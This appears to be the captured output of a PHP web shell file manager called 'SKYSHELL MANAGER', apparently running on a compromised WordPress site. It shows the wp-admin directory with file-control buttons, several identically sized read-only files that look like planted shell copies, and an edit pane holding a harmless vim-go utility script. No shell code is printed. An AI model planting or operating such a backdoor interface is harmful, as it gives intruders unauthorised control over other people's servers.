📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
data.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: util.vim
" PathSep returns the appropriate OS specific path separator. function! go#util#PathSep() if go#util#IsWin() return '\' endif return '/' endfunction " PathListSep returns the appropriate OS specific path list separator. function! go#util#PathListSep() if go#util#IsWin() return ";" endif return ":" endfunction " LineEnding returns the correct line ending, based on the current fileformat function! go#util#LineEnding() if &fileformat == 'dos' return "\r\n" elseif &fileformat == 'mac' return "\r" endif return "\n" endfunction " Join joins any number of path elements into a single path, adding a " Separator if necessary and returns the result function! go#util#Join(...) return join(a:000, go#util#PathSep()) endfunction " IsWin returns 1 if current OS is Windows or 0 otherwise function! go#util#IsWin() let win = ['win16', 'win32', 'win64', 'win95'] for w in win if (has(w)) return 1 endif endfor return 0 endfunction function! go#util#goarch() return substitute(go#util#System('go env GOARCH'), '\n', '', 'g') endfunction function! go#util#goos() return substitute(go#util#System('go env GOOS'), '\n', '', 'g') endfunction function! go#util#goroot() return substitute(go#util#System('go env GOROOT'), '\n', '', 'g') endfunction function! go#util#gopath() return substitute(go#util#System('go env GOPATH'), '\n', '', 'g') endfunction function! go#util#osarch() return go#util#goos() . '_' . go#util#goarch() endfunction "Check if has vimproc function! s:has_vimproc() if !exists('g:go#use_vimproc') if go#util#IsWin() try call vimproc#version() let exists_vimproc = 1 catch let exists_vimproc = 0 endtry else let exists_vimproc = 0 endif let g:go#use_vimproc = exists_vimproc endif return g:go#use_vimproc endfunction if s:has_vimproc() let s:vim_system = get(g:, 'gocomplete#system_function', 'vimproc#system2') let s:vim_shell_error = get(g:, 'gocomplete#shell_error_function', 'vimproc#get_last_status') else let s:vim_system = get(g:, 'gocomplete#system_function', 'system') let s:vim_shell_error = '' endif function! go#util#System(str, ...) let l:shell = &shell let &shell = '/bin/sh' let l:output = call(s:vim_system, [a:str] + a:000) let &shell = l:shell return l:output endfunction function! go#util#ShellError() if empty(s:vim_shell_error) return v:shell_error endif return call(s:vim_shell_error, []) endfunction " StripPath strips the path's last character if it's a path separator. " example: '/foo/bar/' -> '/foo/bar' function! go#util#StripPathSep(path) let last_char = strlen(a:path) - 1 if a:path[last_char] == go#util#PathSep() return strpart(a:path, 0, last_char) endif return a:path endfunction " StripTrailingSlash strips the trailing slash from the given path list. " example: ['/foo/bar/'] -> ['/foo/bar'] function! go#util#StripTrailingSlash(paths) return map(copy(a:paths), 'go#util#StripPathSep(v:val)') endfunction " Shelljoin returns a shell-safe string representation of arglist. The " {special} argument of shellescape() may optionally be passed. function! go#util#Shelljoin(arglist, ...) try let ssl_save = &shellslash set noshellslash if a:0 return join(map(copy(a:arglist), 'shellescape(v:val, ' . a:1 . ')'), ' ') endif return join(map(copy(a:arglist), 'shellescape(v:val)'), ' ') finally let &shellslash = ssl_save endtry endfunction fu! go#util#Shellescape(arg) if s:has_vimproc() return vimproc#shellescape(a:arg) endif try let ssl_save = &shellslash set noshellslash return shellescape(a:arg) finally let &shellslash = ssl_save endtry endf " Shelllist returns a shell-safe representation of the items in the given " arglist. The {special} argument of shellescape() may optionally be passed. function! go#util#Shelllist(arglist, ...) try let ssl_save = &shellslash set noshellslash if a:0 return map(copy(a:arglist), 'shellescape(v:val, ' . a:1 . ')') endif return map(copy(a:arglist), 'shellescape(v:val)') finally let &shellslash = ssl_save endtry endfunction " Returns the byte offset for line and column function! go#util#Offset(line, col) if &encoding != 'utf-8' let sep = go#util#LineEnding() let buf = a:line == 1 ? '' : (join(getline(1, a:line-1), sep) . sep) let buf .= a:col == 1 ? '' : getline('.')[:a:col-2] return len(iconv(buf, &encoding, 'utf-8')) endif return line2byte(a:line) + (a:col-2) endfunction " " Returns the byte offset for the cursor function! go#util#OffsetCursor() return go#util#Offset(line('.'), col('.')) endfunction " Windo is like the built-in :windo, only it returns to the window the command " was issued from function! go#util#Windo(command) let s:currentWindow = winnr() try execute "windo " . a:command finally execute s:currentWindow. "wincmd w" unlet s:currentWindow endtry endfunction " snippetcase converts the given word to given preferred snippet setting type " case. function! go#util#snippetcase(word) let l:snippet_case = get(g:, 'go_snippet_case_type', "snakecase") if l:snippet_case == "snakecase" return go#util#snakecase(a:word) elseif l:snippet_case == "camelcase" return go#util#camelcase(a:word) else return a:word " do nothing endif endfunction " snakecase converts a string to snake case. i.e: FooBar -> foo_bar " Copied from tpope/vim-abolish function! go#util#snakecase(word) let word = substitute(a:word,'::','/','g') let word = substitute(word,'\(\u\+\)\(\u\l\)','\1_\2','g') let word = substitute(word,'\(\l\|\d\)\(\u\)','\1_\2','g') let word = substitute(word,'[.-]','_','g') let word = tolower(word) return word endfunction " camelcase converts a string to camel case. i.e: FooBar -> fooBar " Copied from tpope/vim-abolish function! go#util#camelcase(word) let word = substitute(a:word, '-', '_', 'g') if word !~# '_' && word =~# '\l' return substitute(word,'^.','\l&','') else return substitute(word,'\C\(_\)\=\(.\)','\=submatch(1)==""?tolower(submatch(2)) : toupper(submatch(2))','g') endif endfunction function! go#util#AddTags(line1, line2, ...) " default is json let l:keys = ["json"] if a:0 let l:keys = a:000 endif let l:line1 = a:line1 let l:line2 = a:line2 " If we're inside a struct and just call this function let us add the tags " to all fields " TODO(arslan): I don't like using patterns. Check if we can move it to " `motion` and do it via AST based position let ln1 = searchpair('struct {', '', '}', 'bcnW') if ln1 == 0 echon "vim-go: " | echohl ErrorMsg | echon "cursor is outside the struct" | echohl None return endif " searchpair only returns a single position let ln2 = search('}', "cnW") " if no range is given we apply for the whole struct if l:line1 == l:line2 let l:line1 = ln1 + 1 let l:line2 = ln2 - 1 endif for line in range(l:line1, l:line2) " get the field name (word) that are not part of a commented line let l:matched = matchstr(getline(line), '\(\/\/.*\)\@<!\w\+') if empty(l:matched) continue endif let word = go#util#snippetcase(l:matched) let tags = map(copy(l:keys), 'printf("%s:%s", v:val,"\"'. word .'\"")') let updated_line = printf("%s `%s`", getline(line), join(tags, " ")) " finally, update the line inplace call setline(line, updated_line) endfor endfunction " TODO(arslan): I couldn't parameterize the highlight types. Check if we can " simplify the following functions function! go#util#EchoSuccess(msg) redraw! | echon "vim-go: " | echohl Function | echon a:msg | echohl None endfunction function! go#util#EchoError(msg) redraw! | echon "vim-go: " | echohl ErrorMsg | echon a:msg | echohl None endfunction function! go#util#EchoWarning(msg) redraw! | echon "vim-go: " | echohl WarningMsg | echon a:msg | echohl None endfunction function! go#util#EchoProgress(msg) redraw! | echon "vim-go: " | echohl Identifier | echon a:msg | echohl None endfunction " vim: sw=2 ts=2 et
Save